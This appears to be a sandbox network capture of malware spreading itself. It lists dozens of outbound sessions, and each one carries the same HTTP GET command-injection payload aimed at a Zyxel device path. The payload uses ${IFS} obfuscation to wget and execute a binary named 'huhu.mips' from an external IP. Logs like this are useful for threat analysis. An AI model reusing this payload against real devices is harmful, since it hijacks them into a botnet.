                                            Feb 2, 2024 06:21:05.492003918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2421192.168.2.1545298216.44.157.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492086887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2422192.168.2.1548036173.157.69.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492105007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2423192.168.2.154538612.34.184.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492152929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2424192.168.2.155532257.178.248.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492194891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2425192.168.2.1533784203.72.3.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492233038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2426192.168.2.155141080.196.249.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492258072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2427192.168.2.1537116106.121.205.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492326021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2428192.168.2.1552666100.61.162.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492361069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2429192.168.2.155068023.242.29.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492402077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2430192.168.2.154776036.135.188.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492436886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2431192.168.2.1537390113.102.62.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492489100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2432192.168.2.1539408222.183.178.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492522955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2433192.168.2.154801850.220.82.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492559910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2434192.168.2.153437659.147.213.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492630005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2435192.168.2.154015865.99.250.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492641926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2436192.168.2.155683236.235.28.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492711067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2437192.168.2.155346866.0.110.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492742062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2438192.168.2.154435681.69.184.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492767096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2439192.168.2.153567459.181.239.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492816925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2440192.168.2.1554364152.70.44.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492847919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2441192.168.2.1541946140.221.193.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492881060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2442192.168.2.15402444.223.53.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492924929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2443192.168.2.154522879.149.218.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492952108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2444192.168.2.153714036.2.68.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.492974997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2445192.168.2.1548676199.49.105.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493019104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2446192.168.2.154933018.139.168.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493066072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2447192.168.2.155160852.126.179.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493097067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2448192.168.2.1546756216.254.199.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493149042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2449192.168.2.154783239.49.92.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493175983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2450192.168.2.1559748163.12.204.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493223906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2451192.168.2.156076425.192.212.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493256092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2452192.168.2.156007669.66.17.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493287086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2453192.168.2.1560476173.212.46.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493325949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2454192.168.2.154345492.239.166.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493376017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2455192.168.2.1539122109.54.140.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493412971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2456192.168.2.155849847.49.66.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493433952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2457192.168.2.1556920150.206.126.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493480921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2458192.168.2.1548242131.65.12.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493513107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2459192.168.2.1541672144.12.158.13443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493567944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2460192.168.2.1554464193.232.89.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493596077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2461192.168.2.1547714169.175.245.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493639946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2462192.168.2.1549820199.72.212.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493685961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2463192.168.2.1549906122.67.1.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493773937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2464192.168.2.1538218102.238.30.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493777990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2465192.168.2.155686818.149.132.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493803978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2466192.168.2.155948074.155.37.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493846893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2467192.168.2.1547946140.148.15.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493899107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2468192.168.2.15346804.227.167.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493923903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2469192.168.2.1557984115.81.13.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.493974924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2470192.168.2.153984431.216.16.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494005919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2471192.168.2.153457276.244.248.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494066954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2472192.168.2.1548316183.56.120.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494091988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2473192.168.2.1543960199.203.203.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494127989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2474192.168.2.1545706105.66.103.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494185925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2475192.168.2.1534896178.76.94.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494225979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2476192.168.2.153801879.120.242.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494262934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2477192.168.2.155014427.193.213.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494307041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2478192.168.2.153286024.225.87.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494355917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2479192.168.2.156037641.122.151.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494395971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2480192.168.2.1557964171.158.126.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494431973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2481192.168.2.1549394152.255.112.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494472027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2482192.168.2.155827294.190.175.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494502068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2483192.168.2.1534946208.13.109.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:05.494538069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2484192.168.2.154368251.44.125.150443
                                            TimestampBytes transferredDirectionData
